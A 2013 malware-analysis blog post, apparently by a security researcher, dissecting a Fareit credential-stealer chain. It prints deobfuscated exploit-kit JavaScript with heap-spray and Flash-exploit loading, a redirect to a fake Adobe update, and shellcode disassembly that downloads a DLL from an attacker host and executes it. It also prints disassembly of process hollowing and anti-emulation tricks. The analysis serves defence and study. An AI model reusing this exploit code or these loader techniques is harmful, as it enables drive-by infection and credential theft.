Monday, 22 July 2013
Monday, 11 March 2013
[Developing Post] Fareit still steals your credentials
It started with a given link. h00p://brospecial.net/annihilates/index.html . From which, goes to a couple of re-directions. Here's how it goes...
To further detail, from h00p://brospecial.net/annihilates/index.html it opens with this text...
But in the background opens three java script sources.
h00p://www.lafabbricadelleidee.net/peppiest/comedienne.js and h00p://penwithian.co.uk/hyperventilate/sporran.js opens h00p://11.lamarianella.info/read/engineering_best.php while h00p://www.kiviturizm.com/rationale/equalizing.js opens h00p://11.laptopvspc.com/read/engineering_best.php by simply setting the document.location object.
engineering_best.php
All the scripts point to the result of this PHP page. The content returned in this page contains a self decrypting javascript code.
The decrypted java script results to...
The code above has been edited as it was being debugged.
It uses the PluginDetect, a script module from http://www.pinlady.net/PluginDetect/ , a tool that can determine the currently installed versions of the operating system and selected applications such as IE, Chrome, Adobe flash, and PDF reader. With this tool at hand, the malicious script below the PluginDetect script would then be able to select the exact exploit to execute.
However, in this specific malware script, the application involved is only Adobe Flash. If the version is within 10.0 to 10.2.159, it opens the page
. Then if the version is below 10.3.181.24, it opens
. Either of these are opened in h00p://11.lamarianella.info or h00p://11.laptopvspc.com domain. What is expected here is that it will download SWF files, most likely exploited SWFs that would trigger the shell code by the getShellCode() function. At the time of this writing the SWFs cannot be downloaded anymore.
In any event, the script still is opens h00p://11.sephoracouponscode.com/adobe/ using the default browser regardless of what PluginDetect retrieves from the system environment. This website contains a fake Adobe update site.
The site is a complete replica of the real Adobe site that lures users to download adobe_flash_player.exe , a fake update, actually a malware.
getShellCode()
The shellcode when converted to its binary form is 538 bytes. This code begins by decrypting, not decompressing, the rest of its code. A simple look at the decrypted dump shows a URL:
The code proceeds by locating the first link entry in the EPROCESS blocks, usually NTDLL.DLL . Proceeds by searching for the DWORD 0x0c330408b from the process' base address.
The DWORD value 0x0c330408b is actually equivalent to...
It uses this as a function to return the value pointed by eax and was used in retrieving API addresses from the export table of a loaded library. The APIs retrieved are:
And the final step it does is to download and execute a DLL file.
As of this writing, URL that retrieves wpbt0.dll doesn't exist anymore.
adobe_flash_player.exe
First thing it does is verify that the IOleContainer COM interface exits. This malware requires this interface for it to be able to use global streams later. The malware does this by checking out the existence of this registry key:
Further, this key is also checks for its marker:
This registry key serves as a placeholder where it could possibly store malware information later.
This malware allocates a memory space of 0x019000 , then decrypts a large data over this space. Afterwards, directly passes control to decrypted code. Here's how it passed control:
Then after retn ...
Beam us up to memory space, Scottie!
Now in the virtual allocated space, execution continues by allocating another space withHeapAlloc . It decrypts another data into this new space which turns out that the decrypted data is a PE file. Using the import table information from this new PE's header, it loads all the required libraries and the APIs it will use.
It also calls UnmapViewOfFile with the current running process as its parameter.
This is somehow an Anti-dumping technique. Every file that is executed has a mapped view in the process space. It can also be unmapped which also happens when a process is in the process of termination. Here's a reading from Microsoft (http://msdn.microsoft.com/en-us/library/windows/desktop/aa366882(v=vs.85).aspx):
Since the original malware process has already transferred code control to the allocated memory space, it can successfully achieve un-mapping. Un-mapping also means clearing and freeing up the process space and thus, nothing can be dumped from that area. But in this case, the malware simply removed the process space but references to this process space still exists from the Process Environment Block (PEB).
What happens next is a call to VirtualAlloc requesting a base address stated in the header of the newly decrypted PE file. Since the base address here is 0x0400000 which is the same as that from the un-mapped process, the memory allocation results to success.
It follows copying the decrypted PE to the new allocated process space, but at the same time mapping the PE file based on the information stated in PE's section headers.
Once the copy is done, it patches the PEB with the new PE entry point and image base:
The decrypted PE's entry point code also needs to be patched to work properly:
At this point, the PEB has only been updated with the entry point and the image base, however, the original file name and path were not touched at all. A blackbox dumping of the memory process would seem a different file from that of the originally executed file.
And another code control transfer:
What just happened is that the malware's PE process was totally replaced by a new PE.
And now, the real malware behavior begins.
A whole new process
The main code routines of the malware...
The malware retrieves its required APIs from these libraries...
Notice that it loads ole32.dl l as expected from verifying IOleContainer in the registry where it uses this to push messages and data to a global stream. You can picture that this malware will be using streams to push and pull data.
Next is an anti-emulation technique. Emulators usually simulate the sequence of instructions but has limits. This particular looping technique is commonly employed by different malwares. What it does is try to break the instruction count limits of emulators.
A good emulator should be intelligent enough to skip or mimic this kind of code.
It then adjusts the privilege level of the malware so it can act as if it has administrative privileges.
The privilege level is set to SeImpersonatePrivilege to permit the malware program
To further detail, from h00p://brospecial.net/annihilates/index.html it opens with this text...
But in the background opens three java script sources.
<script type="text/javascript" src="http://www.lafabbricadelleidee.net/peppiest/comedienne.js"></script>
<script type="text/javascript" src="http://penwithian.co.uk/hyperventilate/sporran.js"></script>
<script type="text/javascript" src="http://www.kiviturizm.com/rationale/equalizing.js"></script>
h00p://www.lafabbricadelleidee.net/peppiest/comedienne.js and h00p://penwithian.co.uk/hyperventilate/sporran.js opens h00p://11.lamarianella.info/read/engineering_best.php while h00p://www.kiviturizm.com/rationale/equalizing.js opens h00p://11.laptopvspc.com/read/engineering_best.php by simply setting the document.location object.
engineering_best.php
All the scripts point to the result of this PHP page. The content returned in this page contains a self decrypting javascript code.
if(document.getElementsByTagName("div")[0].style.left===""){gg="getA";}qq="q";gg+="ttri";function cxz(){r=a[gg+"bu"+"te"](i);};qaz="getElem"+"entsB"+"yTagName";zaq="pa";</script><div id="q" 12=";1ikie;095nh;94895;375...A.VERY.LONG.ENCRYPTED.DATA....46eiq"></div><script>
a=document.getElementById(qq);
e=eval;
s="";
for(i=0;;i++){
cxz();
if(r){s=s+r;}else break;
}
a=zxv=s;
s="";
p=e(zaq+"rseInt");
for(i=0;i<a.length;i+=2){
if(a["sub"+"str"](i,1)==";")continue;
if(document[qaz]("d"+"iv")[0].style.left==="")s=s+String["fromCharCode"]((p(a["sub"+"str"](i,2),27)+100)/6);
}
c=s;
e(s);The decrypted java script results to...
var PluginDetect=
{
version:"0.7.9",name:"PluginDetect",handler:function(c,b,a)
{
.... LONG PluginDetect CODE ....
};
PluginDetect.initScript();
PluginDetect.getVersion(".");
var $$ = PluginDetect;
function x(s)
{
d=[];
for(i=0;i<s.length;i++)
{
k=(s.charCodeAt(i)).toString(33);
d.push(k);
};
return d.join(":");
}
end_redirect=function()
{
window.location.href='http://11.sephoracouponscode.com/adobe/';
};
function j1()
{
return false;
}
function j2()
{
return false;
}
function p1()
{
return false;
}
function p2()
{
return false;
}
function f1()
{
var oSpan=document.createElement("span");
document.body.appendChild(oSpan);
var url = "/read/engineering_best.php?gynwb=32:1k:32:1i:1g&aatwawb=3h:3l:38:38:33:37&fteu=2v:1h:1f:33:1m:1f:2v:1k:31:2w&info=02e67fbb1b70fa4a727caa615381613e3d73d9d5370a3436400595f7d0a2e22159e953d3984a6928056c5d9e1c022d7d28c7e56da4d8620bb24d8d8c7904786fe5";
oSpan.innerHTML="<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' id='asd' width='600' height='400' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab'><param name='movie' value='"+url+"' /><embed src='"+url+"' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>";
}
function getCN()
{
return "/read/engineering_best.php?airiuzz=32:1k:32:1i:1g&abi=3f:3k:34:3h:35&aedzxmmw=2v:1h:1f:33:1m:1f:2v:1k:31:2w&deb=vlwp"
}
function getBlockSize()
{
return 1024
}
function getAllocSize()
{
return 1024*1024
}
function getAllocCount()
{
return 300
}
function getFillBytes()
{
var a='%u'+'0c0c';
return a+a
}
function getShellCode()
{
var a="8282!...LONG.SHELLCODE.DATA...%1414!%".split("").reverse().join("");
return a["replace"](/%!/g,"%"+"u")
};
function ff2()
{
var oSpan=document.createElement("span");
var url="/read/engineering_best.php?xtekiq=32:1k:32:1i:1g&uqphr=31:3b:3d:36&gpjxgrfu=2v:1h:1f:33:1m:1f:2v:1k:31:2w&gbgbyq=lfha";
oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='"+url+"' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed src='"+url+"' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'></embed></object>";
document.body.appendChild(oSpan);
}
document.write('');
setTimeout(end_redirect,61000);
var pdfver=[];
function svwrbew6436b($)
{
var ar = [];
var javax = ($.getVersion("Ja"+"va")+".").toString()["split"](".");
if ($.isMinVersion("Ja"+"va")>=0&&((javax[0]==1&&javax[1]==7&&javax[3]<9)))
{
ar["push"](j2); //false
}
else if($.isMinVersion("Ja"+"va")>=0&&((javax[0]==1&&javax[1]==6&&javax[3]<33)||(javax[0]==1&&javax[1]<6)))
{
ar["push"](j1); //false
}
pdfver=PluginDetect.getVersion("AdobeReader");
if(window.document)if(typeof pdfver=="string")
{
pdfver=pdfver["split"](".")
}
else
{
pdfver=[0,0,0,0]
}
if(pdfver[0]>0&&pdfver[0]<8)
{
if(window.document)ar["push"](p1); //false
}
if(window.document&&(pdfver[0]==8||(pdfver[0]==9&&pdfver[1]<4)))
{
ar["push"](p2); //false
}
var ver = ($$.getVersion("Flash")+".").toString()["split"](".");
if (
(
(ver[0]==10&&ver[1]==0&&ver[2]>40) // >10.0.40
||
(
window.document
&&
(ver[0]==10&&ver[1]>0) // >10.0
&&
(ver[0]==10&&ver[1]<2) // <10.2
)
)
||
(
window.document
&& (
(ver[0]==10&&ver[1]==2&&ver[2]<159) // <10.2.159
||
(ver[0]==10&&ver[1]<2) // <10.2
)
)
)
{
ar["push"](ff2);
}
if(
(ver[0]==10&&ver[1]==3&&ver[2]==181&&ver[3]<=23) // <10.3.181.24
||
(ver[0]==10&&ver[1]==3&&ver[2]<181) // <10.3.181
)
{
ar["push"](f1);
}
var arcalli=0;
var arcall = function()
{
if(ar.length<=arcalli)return 123;
ss=setTimeout;
var res=ar[arcalli]();
arcalli++;
if(res&&window.document)
{
ss(function()
{
arcall()
}
,5509);
}
else
{
arcall();
}
};
arcall();
}
$$["onDetec"+"tionDone"]("Ja"+"va", svwrbew6436b, "../treating/getJavaInfo.jar");
The code above has been edited as it was being debugged.
It uses the PluginDetect, a script module from http://www.pinlady.net/PluginDetect/ , a tool that can determine the currently installed versions of the operating system and selected applications such as IE, Chrome, Adobe flash, and PDF reader. With this tool at hand, the malicious script below the PluginDetect script would then be able to select the exact exploit to execute.
However, in this specific malware script, the application involved is only Adobe Flash. If the version is within 10.0 to 10.2.159, it opens the page
/read/engineering_best.php?xtekiq=32:1k:32:1i:1g&uqphr=31:3b:3d:36&gpjxgrfu=2v:1h:1f:33:1m:1f:2v:1k:31:2w&gbgbyq=lfha
. Then if the version is below 10.3.181.24, it opens
/read/engineering_best.php?gynwb=32:1k:32:1i:1g&aatwawb=3h:3l:38:38:33:37&fteu=2v:1h:1f:33:1m:1f:2v:1k:31:2w&info=02e67fbb1b70fa4a727caa615381613e3d73d9d5370a3436400595f7d0a2e22159e953d3984a6928056c5d9e1c022d7d28c7e56da4d8620bb24d8d8c7904786fe5
. Either of these are opened in h00p://11.lamarianella.info or h00p://11.laptopvspc.com domain. What is expected here is that it will download SWF files, most likely exploited SWFs that would trigger the shell code by the getShellCode() function. At the time of this writing the SWFs cannot be downloaded anymore.
In any event, the script still is opens h00p://11.sephoracouponscode.com/adobe/ using the default browser regardless of what PluginDetect retrieves from the system environment. This website contains a fake Adobe update site.
The site is a complete replica of the real Adobe site that lures users to download adobe_flash_player.exe , a fake update, actually a malware.
getShellCode()
The shellcode when converted to its binary form is 538 bytes. This code begins by decrypting, not decompressing, the rest of its code. A simple look at the decrypted dump shows a URL:
The code proceeds by locating the first link entry in the EPROCESS blocks, usually NTDLL.DLL . Proceeds by searching for the DWORD 0x0c330408b from the process' base address.
seg000:00000026 33 C0 xor eax, eax
seg000:00000028 64 8B 40 30 mov eax, fs:[eax+30h]
seg000:0000002C 8B 40 0C mov eax, [eax+0Ch]
seg000:0000002F 8B 70 1C mov esi, [eax+1Ch]
seg000:00000032 56 push esi
seg000:00000033 8B 76 08 mov esi, [esi+8]
seg000:00000036 33 DB xor ebx, ebx
seg000:00000038 66 8B 5E 3C mov bx, [esi+3Ch]
seg000:0000003C 03 74 33 2C add esi, [ebx+esi+2Ch]
seg000:00000040 81 EE 15 10 FF FF sub esi, 0FFFF1015h
seg000:00000046 B8 8B 40 30 C3 mov eax, 0C330408Bh
seg000:0000004B
seg000:0000004B loc_4B:
seg000:0000004B 46 inc esi
seg000:0000004C 39 06 cmp [esi], eax
seg000:0000004E 75 FB jnz short loc_4B
The DWORD value 0x0c330408b is actually equivalent to...
mov eax, [eax+30h]
retn
It uses this as a function to return the value pointed by eax and was used in retrieving API addresses from the export table of a loaded library. The APIs retrieved are:
seg000:00000189 8E 4E 0E EC dd 0EC0E4E8Eh ; LoadLibraryA
seg000:0000018D 98 FE 8A 0E dd 0E8AFE98h ; WinExec
seg000:00000191 89 6F 01 BD dd 0BD016F89h ; TerminateThread
seg000:00000195 33 CA 8A 5B dd 5B8ACA33h ; GetTempPathA
seg000:00000199 1B C6 46 79 dd 7946C61Bh ; VirtualProtect
seg000:0000019D 36 1A 2F 70 dd 702F1A36h ; URLDownloadToFileA
And the final step it does is to download and execute a DLL file.
seg000:0000014C 6A 00 push 0
seg000:0000014E 6A 00 push 0
seg000:00000150 53 push ebx ; C:DOCUME~1ADMINI~1LOCALS~1Tempwpbt0.dll
seg000:00000151 57 push edi ; "http://11.lamarianella.info/read/engineering_best.php?kf=32:1k:32:1i:1g&ue=2v:1h:1f:33:1m:1f:2v:1k:31:2w&v=1k&jb=z&ey=j"
seg000:00000152 6A 00 push 0
seg000:00000154 FF 56 14 call dword ptr [esi+14h] ; URLDownloadToFileA
seg000:00000157 85 C0 test eax, eax
seg000:00000159 75 16 jnz short notdownloaded
seg000:0000015B 6A 00 push 0
seg000:0000015D 53 push ebx ; C:DOCUME~1ADMINI~1LOCALS~1Tempwpbt0.dll
seg000:0000015E FF 56 04 call dword ptr [esi+4] ; WinExec
seg000:00000161 6A 00 push 0
seg000:00000163 83 EB 0C sub ebx, 0Ch
seg000:00000166 53 push ebx ; regsvr32 -s C:DOCUME~1ADMINI~1LOCALS~1Tempwpbt0.dll
seg000:00000167 FF 56 04 call dword ptr [esi+4] ; WinExec
As of this writing, URL that retrieves wpbt0.dll doesn't exist anymore.
adobe_flash_player.exe
First thing it does is verify that the IOleContainer COM interface exits. This malware requires this interface for it to be able to use global streams later. The malware does this by checking out the existence of this registry key:
HKEY_LOCAL_MACHINESOFTWAREClassesInterface{0000011b-0000-0000-c000-000000000046}Further, this key is also checks for its marker:
HKEY_LOCAL_MACHINESOFTWAREClassesInterface{0000011b-0000-0000-c000-000000000046}11This registry key serves as a placeholder where it could possibly store malware information later.
This malware allocates a memory space of 0x019000 , then decrypts a large data over this space. Afterwards, directly passes control to decrypted code. Here's how it passed control:
.text:0040180D mov ecx, ALLOCATED_MEM_BASE
.text:00401813 add ecx, 17AD0h
.text:00401819 mov NEW_EIP, ecx
.text:0040181F mov eax, eax
.text:00401821 mov eax, eax
.text:00401823 mov eax, eax
.text:00401825 popa
.text:00401826 mov eax, eax
.text:00401828 mov eax, eax
.text:0040182A mov eax, eax
.text:0040182C mov eax, eax
.text:0040182E push 368282h
.text:00401833 mov eax, [ebp+offset_CALL_EAX_FUNC]
.text:00401836 mov eax, eax
.text:00401838 mov eax, eax
.text:0040183A mov ecx, esp ; Replace TOS
.text:0040183C push edx
.text:0040183D mov edx, ecx
.text:0040183F sub edx, 26h
.text:00401842 mov ecx, edx
.text:00401844 pop edx
.text:00401845 add ecx, 22h
.text:00401848 mov eax, eax
.text:0040184A mov eax, eax
.text:0040184C mov eax, eax
.text:0040184E mov dword ptr [ecx+4], 0 ; Clear TOS
.text:00401855 mov eax, eax
.text:00401857 mov eax, eax
.text:00401859 mov eax, eax
.text:0040185B add [ecx+4], eax ; Set TOS with value of EAX
.text:0040185E mov eax, eax
.text:00401860 retn
Then after retn ...
.text:00401490 CALL_EAX_FUNC proc near ; CODE XREF: sub_4014C0+13C p
.text:00401490 ; sub_4014C0+156 p
.text:00401490 ; DATA XREF: sub_4014C0+C o
.text:00401490 ; sub_4014C0+2CF o
.text:00401490 push ebp
.text:00401491 mov ebp, esp
.text:00401493 mov eax, eax
.text:00401495 mov eax, eax
.text:00401497 mov eax, eax
.text:00401499 mov esp, EXECUTE_ADDRESS_1_ESP
.text:0040149F mov eax, eax
.text:004014A1 mov eax, eax
.text:004014A3 mov eax, eax
.text:004014A5 add esp, 4
.text:004014A8 mov eax, eax
.text:004014AA mov eax, eax
.text:004014AC mov eax, eax
.text:004014AE mov eax, NEW_EIP
.text:004014B3 mov eax, eax
.text:004014B5 mov eax, eax
.text:004014B7 push eax
.text:004014B8 retn
.text:004014B8 CALL_EAX_FUNC endp
Beam us up to memory space, Scottie!
Now in the virtual allocated space, execution continues by allocating another space withHeapAlloc . It decrypts another data into this new space which turns out that the decrypted data is a PE file. Using the import table information from this new PE's header, it loads all the required libraries and the APIs it will use.
It also calls UnmapViewOfFile with the current running process as its parameter.
seg000:002978C5 68 14 03 28 00 push offset aUnmapviewoffil ; "UnmapViewOfFile"
seg000:002978CA A1 48 7D 29 00 mov eax, ds:hKernelProcess
seg000:002978CF 50 push eax
seg000:002978D0 E8 4B FB FF FF call _GetProcAddress
seg000:002978D5 83 C4 08 add esp, 8
seg000:002978D8 89 45 DC mov [ebp+var_24], eax
seg000:002978DB 83 3D 44 7D 29 00 00 cmp ds:bSUCCESS, 0
seg000:002978E2 75 0A jnz short loc_2978EE
seg000:002978E4 8B 0D 3C 7D 29 00 mov ecx, ds:hThisProcess ; our calling process PE at base 0x400000
seg000:002978EA 51 push ecx
seg000:002978EB FF 55 DC call [ebp+var_24] ; UnmapViewOfFile
This is somehow an Anti-dumping technique. Every file that is executed has a mapped view in the process space. It can also be unmapped which also happens when a process is in the process of termination. Here's a reading from Microsoft (http://msdn.microsoft.com/en-us/library/windows/desktop/aa366882(v=vs.85).aspx):
Unmapping a mapped view of a file invalidates the range occupied by the view in the address space of the process and makes the range available for other allocations. It removes the working set entry for each unmapped virtual page that was part of the working set of the process and reduces the working set size of the process. It also decrements the share count of the corresponding physical page.
Since the original malware process has already transferred code control to the allocated memory space, it can successfully achieve un-mapping. Un-mapping also means clearing and freeing up the process space and thus, nothing can be dumped from that area. But in this case, the malware simply removed the process space but references to this process space still exists from the Process Environment Block (PEB).
What happens next is a call to VirtualAlloc requesting a base address stated in the header of the newly decrypted PE file. Since the base address here is 0x0400000 which is the same as that from the un-mapped process, the memory allocation results to success.
seg000:002978F7 6A 40 push 40h
seg000:002978F9 68 00 30 00 00 push 3000h
seg000:002978FE 8B 55 FC mov edx, [ebp+var_4]
seg000:00297901 52 push edx
seg000:00297902 8B 45 E0 mov eax, [ebp+var_20]
seg000:00297905 8B 48 34 mov ecx, [eax+34h]
seg000:00297908 51 push ecx
seg000:00297909 FF 55 F0 call [ebp+VirtualAllocAddress] ; Results creating base 400000
It follows copying the decrypted PE to the new allocated process space, but at the same time mapping the PE file based on the information stated in PE's section headers.
seg000:0029784B 8B 45 F4 mov eax, [ebp+var_C]
seg000:0029784E 83 C0 01 add eax, 1
seg000:00297851 89 45 F4 mov [ebp+var_C], eax
seg000:00297854 loc_297854:
seg000:00297854 8B 4D E0 mov ecx, [ebp+var_20]
seg000:00297857 0F B7 51 06 movzx edx, word ptr [ecx+6]
seg000:0029785B 39 55 F4 cmp [ebp+var_C], edx
seg000:0029785E 73 59 jnb short loc_2978B9
seg000:00297860 8B 45 E8 mov eax, [ebp+var_18]
seg000:00297863 83 78 14 00 cmp dword ptr [eax+14h], 0
seg000:00297867 74 45 jz short loc_2978AE
seg000:00297869 8B 4D E8 mov ecx, [ebp+var_18]
seg000:0029786C 83 79 10 00 cmp dword ptr [ecx+10h], 0
seg000:00297870 74 3C jz short loc_2978AE
seg000:00297872 8B 55 E8 mov edx, [ebp+var_18]
seg000:00297875 8B 42 10 mov eax, [edx+10h]
seg000:00297878 8B 4D E0 mov ecx, [ebp+var_20]
seg000:0029787B 8B 51 3C mov edx, [ecx+3Ch]
seg000:0029787E 8D 44 10 FF lea eax, [eax+edx-1]
seg000:00297882 8B 4D E0 mov ecx, [ebp+var_20]
seg000:00297885 33 D2 xor edx, edx
seg000:00297887 F7 71 3C div dword ptr [ecx+3Ch]
seg000:0029788A 8B 55 E0 mov edx, [ebp+var_20]
seg000:0029788D 0F AF 42 3C imul eax, [edx+3Ch]
seg000:00297891 50 push eax
seg000:00297892 8B 45 E8 mov eax, [ebp+var_18]
seg000:00297895 8B 4D 08 mov ecx, [ebp+arg_0]
seg000:00297898 03 48 14 add ecx, [eax+14h]
seg000:0029789B 51 push ecx
seg000:0029789C 8B 55 E8 mov edx, [ebp+var_18]
seg000:0029789F 8B 45 E4 mov eax, [ebp+var_1C]
seg000:002978A2 03 42 0C add eax, [edx+0Ch]
seg000:002978A5 50 push eax
seg000:002978A6 E8 15 FE FF FF call _memcpy
seg000:002978AB 83 C4 0C add esp, 0Ch
seg000:002978AE loc_2978AE:
seg000:002978AE 8B 4D E8 mov ecx, [ebp+var_18]
seg000:002978B1 83 C1 28 add ecx, 28h
seg000:002978B4 89 4D E8 mov [ebp+var_18], ecx
seg000:002978B7 EB 92 jmp short loc_29784B
Once the copy is done, it patches the PEB with the new PE entry point and image base:
seg000:00297726 A1 5C 7D 29 00 mov eax, ds:_TIB
seg000:0029772B 8B D2 mov edx, edx
seg000:0029772D 33 C9 xor ecx, ecx
seg000:0029772F db 3Eh
seg000:0029772F 3E 8B 40 30 mov eax, [eax+30h]
seg000:00297733 8B D2 mov edx, edx
seg000:00297735 8B D2 mov edx, edx
seg000:00297737 db 3Eh
seg000:00297737 3E 8B 48 0C mov ecx, [eax+0Ch]
seg000:0029773B 8B D2 mov edx, edx
seg000:0029773D 89 4D F4 mov [ebp+var_C], ecx
seg000:00297740 8B 45 F4 mov eax, [ebp+var_C]
seg000:00297743 8B 48 0C mov ecx, [eax+0Ch] ; +0x00c InLoadOrderModuleList
seg000:00297746 89 4D F8 mov [ebp+var_8], ecx
seg000:00297749 8B 55 F8 mov edx, [ebp+var_8]
seg000:0029774C 89 55 FC mov [ebp+var_4], edx
seg000:0029774F
seg000:0029774F loc_29774F:
seg000:0029774F B8 01 00 00 00 mov eax, 1
seg000:00297754 85 C0 test eax, eax
seg000:00297756 74 44 jz short loc_29779C
seg000:00297758 83 7D F8 00 cmp [ebp+var_8], 0
seg000:0029775C 75 04 jnz short loc_297762
seg000:0029775E 33 C0 xor eax, eax
seg000:00297760 EB 3C jmp short loc_29779E
seg000:00297762 loc_297762:
seg000:00297762 8B 4D F8 mov ecx, [ebp+var_8]
seg000:00297765 8B 51 18 mov edx, [ecx+18h] ; Base Address
seg000:00297768 3B 55 08 cmp edx, [ebp+arg_0]
seg000:0029776B 75 19 jnz short loc_297786
seg000:0029776D 8B 45 F8 mov eax, [ebp+var_8]
seg000:00297770 8B 4D 0C mov ecx, [ebp+arg_4]
seg000:00297773 89 48 1C mov [eax+1Ch], ecx ; Entry Point
seg000:00297776 8B 55 F8 mov edx, [ebp+var_8]
seg000:00297779 8B 45 10 mov eax, [ebp+arg_8]
seg000:0029777C 89 42 18 mov [edx+18h], eax ; Base Address
The decrypted PE's entry point code also needs to be patched to work properly:
seg000:00297700 sub_297700 proc near
seg000:00297700 55 push ebp
seg000:00297701 8B EC mov ebp, esp
seg000:00297703 A1 68 7D 29 00 mov eax, ds:DecryptedPEEntryPoint
seg000:00297708 C6 00 68 mov byte ptr [eax], 68h
seg000:0029770B 8B 15 60 7D 29 00 mov edx, ds:EntryPoint
seg000:00297711 89 50 01 mov [eax+1], edx
seg000:00297714 B2 C3 mov dl, 0C3h
seg000:00297716 88 50 05 mov [eax+5], dl
seg000:00297719 5D pop ebp
seg000:0029771A C3 retn
seg000:0029771A sub_297700 endp
At this point, the PEB has only been updated with the entry point and the image base, however, the original file name and path were not touched at all. A blackbox dumping of the memory process would seem a different file from that of the originally executed file.
And another code control transfer:
seg000:00297CF1 E8 8A FD FF FF call Garbage
seg000:00297CF6 8B 15 60 7D 29 00 mov edx, ds:EntryPoint
seg000:00297CFC 52 push edx ; Run New program
seg000:00297CFD C3 retn
What just happened is that the malware's PE process was totally replaced by a new PE.
And now, the real malware behavior begins.
A whole new process
The main code routines of the malware...
- Initiate some stuff and set privileges
- An anti-emulation
- Steal credentials and send em'
- Download and execute more files
- Steal more... Windows credentials
- Send em'
- Delete self
The malware retrieves its required APIs from these libraries...
.text:00402530 push offset StgOpenStorage ; int
.text:00402535 push offset aOle32_dll_0 ; "ole32.dll"
.text:0040253A call sub_4024D6
.text:0040253F push offset CryptUnprotectData ; int
.text:00402544 push offset aCrypt32_dll ; "crypt32.dll"
.text:00402549 call sub_4024D6
.text:0040254E push offset AllocateAndInitializeSid ; int
.text:00402553 push offset aAdvapi32_dll_0 ; "advapi32.dll"
.text:00402558 call sub_4024D6
.text:0040255D push offset SHGetFolderPathA ; int
.text:00402562 push offset aShell32_dll_1 ; "shell32.dll"
.text:00402567 call sub_4024D6
.text:0040256C push offset NetApiBufferFree ; int
.text:00402571 push offset aNetapi32_dll ; "netapi32.dll"
.text:00402576 call sub_4024D6
.text:0040257B push offset WTSGetActiveConsoleSessionId ; int
.text:00402580 push offset aKernel32_dll_1 ; "kernel32.dll"
.text:00402585 call sub_4024D6
.text:0040258A push offset MsiGetComponentPathA ; int
.text:0040258F push offset aMsi_dll ; "msi.dll"
.text:00402594 call sub_4024D6
.text:00402599 push offset PStoreCreateInstance ; int
.text:0040259E push offset aPstorec_dll ; "pstorec.dll"
.text:004025A3 call sub_4024D6
.text:004025A8 push offset CreateEnvironmentBlock ; int
.text:004025AD push offset aUserenv_dll_0 ; "userenv.dll"
.text:004025B2 call sub_4024D6
.text:004025B7 retn
Notice that it loads ole32.dl l as expected from verifying IOleContainer in the registry where it uses this to push messages and data to a global stream. You can picture that this malware will be using streams to push and pull data.
Next is an anti-emulation technique. Emulators usually simulate the sequence of instructions but has limits. This particular looping technique is commonly employed by different malwares. What it does is try to break the instruction count limits of emulators.
.text:0040FAD2 mov ecx, ecx
.text:0040FAD4 push 123EA83h ; loop counter
.text:0040FAD9 mov ecx, ecx
.text:0040FADB pop [ebp+var_4]
.text:0040FADE mov edx, eax
.text:0040FAE0 jmp short loc_40FB06
.text:0040FAE2 loc_40FAE2:
.text:0040FAE2 mov edx, eax
.text:0040FAE4 mov ecx, ecx
.text:0040FAE6 add eax, esi
.text:0040FAE8 mov edx, eax
.text:0040FAEA mov ecx, ecx
.text:0040FAEC push eax
.text:0040FAED mov ecx, ecx
.text:0040FAEF mov edx, eax
.text:0040FAF1 call GetTickCount
.text:0040FAF6 mov ecx, ecx
.text:0040FAF8 pop eax
.text:0040FAF9 mov edx, eax
.text:0040FAFB mov ecx, ecx
.text:0040FAFD add eax, edx
.text:0040FAFF mov ecx, ecx
.text:0040FB01 mov edx, eax
.text:0040FB03 dec [ebp+var_4]
.text:0040FB06 loc_40FB06:
.text:0040FB06 cmp [ebp+var_4], 0
.text:0040FB0A jnz short loc_40FAE2
A good emulator should be intelligent enough to skip or mimic this kind of code.
It then adjusts the privilege level of the malware so it can act as if it has administrative privileges.
.text:004029AC push eax ; lpLuid
.text:004029AD push [ebp+lpName] ; lpName - "SeImpersonatePrivilege"
.text:004029B0 push 0 ; lpSystemName
.text:004029B2 call LookupPrivilegeValueA
.text:004029B8 or eax, eax
.text:004029BA jz short loc_402A17
.text:004029BC call GetCurrentProcess
.text:004029C1 mov edx, eax
.text:004029C3 lea eax, [ebp+hObject]
.text:004029C6 push eax ; TokenHandle
.text:004029C7 push TOKEN_ADJUST_PRIVILEGES ; DesiredAccess
.text:004029C9 push edx ; ProcessHandle
.text:004029CA call OpenProcessToken
.text:004029D0 or eax, eax
.text:004029D2 jz short loc_4029FD
.text:004029D4 mov [ebp+NewState.PrivilegeCount], 1
.text:004029DB push [ebp+Luid.LowPart]
.text:004029DE pop [ebp+NewState.Privileges.Luid.LowPart]
.text:004029E1 push [ebp+Luid.HighPart]
.text:004029E4 pop [ebp+NewState.Privileges.Luid.HighPart]
.text:004029E7 cmp [ebp+arg_4], 0
.text:004029EB jz short loc_4029F6
.text:004029ED mov [ebp+NewState.Privileges.Attributes], SE_PRIVILEGE_ENABLED
.text:004029F4 jmp short loc_4029FD
.text:004029F6 loc_4029F6:
.text:004029F6 mov [ebp+NewState.Privileges.Attributes], 0
.text:004029FD loc_4029FD:
.text:004029FD ; sub_402977+7D j
.text:004029FD push 0 ; ReturnLength
.text:004029FF push 0 ; PreviousState
.text:00402A01 push 10h ; BufferLength
.text:00402A03 lea eax, [ebp+NewState]
.text:00402A06 push eax ; NewState
.text:00402A07 push 0 ; DisableAllPrivileges
.text:00402A09 push [ebp+hObject] ; TokenHandle
.text:00402A0C call AdjustTokenPrivileges
.text:00402A12 or eax, eax
.text:00402A14 jz short loc_402A17
.text:00402A16 inc ebx
.text:00402A17 loc_402A17:
.text:00402A17 cmp [ebp+hObject], 0
.text:00402A1B jz short loc_402A25
.text:00402A1D push [ebp+hObject] ; hObject
.text:00402A20 call CloseHandle
The privilege level is set to SeImpersonatePrivilege to permit the malware program
Saturday, 2 March 2013
Breaking MSVBVM60.DLL
Reversing Visual Basic compiled executable requires some sort of understanding of its native code APIs. These can be found in the Language Extension DLL. In Visual Basic 6.0, the library used was MSVBVM60.DLL. Older versions use MSBVBM50.DLL.
However, with the introduction of the .NET framework, new versions of Visual Basic compiled programs runs through the CLR (Common Language Runtime). Unlike those compiled in VB6, these new versions can only be set as a standalone program if they are bundled in an installer containing the .NET redistributable package.
With this in mind, malware authors would rather choose VB6 since not all Windows users have .NET framework installed.
The Visual Basic Executable
